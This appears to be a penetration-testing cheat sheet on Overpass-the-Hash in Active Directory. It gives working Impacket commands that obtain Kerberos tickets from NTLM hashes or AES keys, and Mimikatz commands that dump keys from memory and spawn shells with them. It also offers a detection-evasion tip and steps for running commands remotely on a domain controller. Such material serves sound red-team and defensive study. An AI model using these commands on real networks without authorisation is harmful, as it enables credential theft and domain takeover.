Overpass the Hash/Pass the Key

Whereas in Pass the Hash attacks the NTLM hash is used directly to authenticate, in Overpass the Hash attacks it is used to submit a signed request to the Kerberos Key Distribution Center (KDC, hosted on the Domain Controller) for a full Kerberos TGT (Ticket Granting Ticket) or service ticket on behalf of the compromised user. That ticket can then provide access to a wide range of services and assets.

The idea of overpass-the-hash is for an attacker to use the NTLM hash of another user account to obtain a Kerberos ticket which can be used to access network resources. This can come in handy if you are only able to obtain the NTLM hash for an account.

Prerequisites

Requires access to the admin share "Admin$", which requires local administrative rights on the target machine.

  • Valid NTLM hash or AES key of a user on a compromised computer or DC
  • Administrative privileges on the compromised machine

Remotely (Kali) – Using Impacket

impacket-getTGT takes a password, NTLM hash or AES key, requests a Kerberos TGT from the DC and saves it as a ccache file.

IP=x.x.x.x # IP of DC
DOMAIN=example.com
USER=Administrator
impacket-getTGT -dc-ip $IP -hashes :<NTLM hash> ${DOMAIN}/${USER}
impacket-getTGT -dc-ip $IP ${DOMAIN}/${USER}:MYCOMPROMISEDPASSWORD

Inject the ticket to access the resource

export KRB5CCNAME=${USER}.ccache
impacket-psexec -dc-ip $IP -target-ip $IP -no-pass -k ${DOMAIN}/${USER}@<target machine name>.${DOMAIN}
impacket-smbexec -dc-ip $IP -target-ip $IP -no-pass -k ${DOMAIN}/${USER}@<target machine name>.${DOMAIN}
impacket-wmiexec -dc-ip $IP -target-ip $IP -no-pass -k ${DOMAIN}/${USER}@<target machine name>.${DOMAIN}

Locally (victim) – Using Mimikatz

See Mimikatz.

Fetch all keys NTLM (RC4), AES128, AES256 key

privilege::debug
sekurlsa::ekeys

Open a PowerShell window as the compromised user

sekurlsa::pth /user:john /domain:example.com /ntlm:<NTLM HASH> /run:PowerShell.exe
sekurlsa::pth /user:Administrator /domain:ignite.local /aes128:<AES 128 key>
sekurlsa::pth /user:Administrator /domain:ignite.local /aes256:<AES 256 key>

If you inject the NTLM (RC4), AES128 and AES256 keys simultaneously into the Kerberos ticket, this step is more secure and undetectable on the network (according to Hacking Articles).

sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:<NTLM HASH> /aes128:<AES 128 KEY> /aes256:<AES 256 key>

Generate a TGT by connecting to a network share (SMB) on the DC and list tickets

net use \\dc01
klist
dir \\dc01\c$
klist

We can now use Kerberos authentication instead of NTLM. We can use any tools that rely on Kerberos like PsExec (see Sysinternals).

Run commands remotely on the DC

psexec.exe \\dc01 cmd.exe
ipconfig
whoami